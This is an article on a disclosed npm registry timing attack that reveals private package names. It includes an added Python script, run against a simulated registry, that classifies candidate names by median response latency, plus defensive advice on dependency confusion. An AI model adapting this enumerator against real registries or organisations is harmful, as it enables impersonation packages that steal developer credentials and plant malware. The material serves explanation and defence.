Security researchers at Aqua Security have disclosed a new npm timing attack that lets a threat actor discover the names of private packages in the npm registry, which could then be used to publish malicious public clones and trick developers into installing them instead. The attack relies on a slight but consistent difference in response time when the registry API is asked for a non-existent package versus a private one. When a non-existent package name is requested, the 404 error comes back in an average of 101 milliseconds; when a private package is requested, the average response time is 648 milliseconds.
The gap is well under a second, but it is consistent enough to be measured, which could let an attacker map every private package an organization has published. Combined with historical package data, the threat actor could also work out which of those packages used to be public. With that list, an attacker could publish public packages that impersonate the private ones in order to steal developer credentials and install malware. Ultimately this could give an attacker access to the private packages themselves, with the ability to modify them, leading to further compromise and disruption of the software supply chain.
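The following is an added example of how such a timing oracle is turned into a classifier; it is illustrative code, not Aqua Security's research tooling. The organization scope `@example-org`, the candidate names, the private package list, and the jitter model are all constructed for the demo. The only figures taken from the text are the two averages (101 ms for a 404, 648 ms for a private package). The probe is simulated so the script runs offline; a live probe would time an HTTP GET against `https://registry.npmjs.org/<name>` and return the same millisecond value. The practitioner's check that matters is the one the code enforces: a single measurement is unreliable on a real network, so each name is probed several times and the median is compared against a 404 baseline calibrated on a name that cannot exist.

```python
"""Timing-oracle enumeration of private package names (added illustration)."""
import random
import statistics
from typing import Callable, Dict, List, Sequence

# A probe returns the observed round-trip time in milliseconds for one
# registry lookup of `name`. A live version would time an HTTP GET to
# https://registry.npmjs.org/<name>; the simulated one below keeps the
# example offline.
LatencyProbe = Callable[[str], float]

PRIVATE_MS = 648.0   # average response for an existing private package (from the article)
MISSING_MS = 101.0   # average response for a 404 on a non-existent name (from the article)


def make_simulated_registry(private_names: Sequence[str], seed: int = 7) -> LatencyProbe:
    """Build a fake registry whose latency leaks whether a name exists.

    The noise model is constructed for the demo: about +/-40 ms of Gaussian
    jitter per request plus an occasional slow outlier, roughly what a real
    network path would add on top of the server-side difference.
    """
    private = set(private_names)
    rng = random.Random(seed)

    def probe(name: str) -> float:
        base = PRIVATE_MS if name in private else MISSING_MS
        noise = rng.gauss(0.0, 40.0)
        if rng.random() < 0.05:              # 1 in 20 requests hits a slow path
            noise += rng.uniform(300.0, 800.0)
        return max(1.0, base + noise)

    return probe


def median_latency(probe: LatencyProbe, name: str, samples: int = 9) -> float:
    """Median of repeated probes; the median discards the outliers that
    would fool a single measurement."""
    observed: List[float] = [probe(name) for _ in range(samples)]
    return statistics.median(observed)


def baseline_404(probe: LatencyProbe, scope: str, samples: int = 9, seed: int = 0) -> float:
    """Calibrate the 404 latency on a name that cannot exist: random hex
    under the target scope."""
    rng = random.Random(seed)
    fake = "%s/%032x" % (scope, rng.getrandbits(128))
    return median_latency(probe, fake, samples)


def enumerate_private(probe: LatencyProbe, scope: str, candidates: Sequence[str],
                      ratio: float = 2.5, samples: int = 9) -> Dict[str, bool]:
    """Flag each candidate as private (True) or non-existent (False).

    A candidate is called private when its median latency exceeds the
    calibrated 404 baseline by `ratio`. With 101 ms versus 648 ms the real
    gap is about 6x, so 2.5x leaves headroom for noise in both directions
    while still rejecting ordinary jitter on a 404.
    """
    threshold = baseline_404(probe, scope, samples) * ratio
    return {
        name: median_latency(probe, f"{scope}/{name}", samples) > threshold
        for name in candidates
    }


if __name__ == "__main__":
    scope = "@example-org"                                   # constructed org scope
    secret = [f"{scope}/billing", f"{scope}/auth-core"]      # constructed private packages
    probe = make_simulated_registry(secret)
    wordlist = ["auth-core", "billing", "logger", "utils", "api-client"]
    for name, is_private in enumerate_private(probe, scope, wordlist).items():
        print(f"{scope}/{name}: {'PRIVATE' if is_private else 'not found'}")
```

The defensive side follows from the same model: the oracle only helps an attacker if the org's scope or the guessed names are free to be published publicly, so the usual dependency-confusion hygiene (claiming the organization scope on the public registry, reserving placeholder packages for internal names, and pinning internal installs to the private registry) removes the payoff even though the timing difference itself is the registry's to fix.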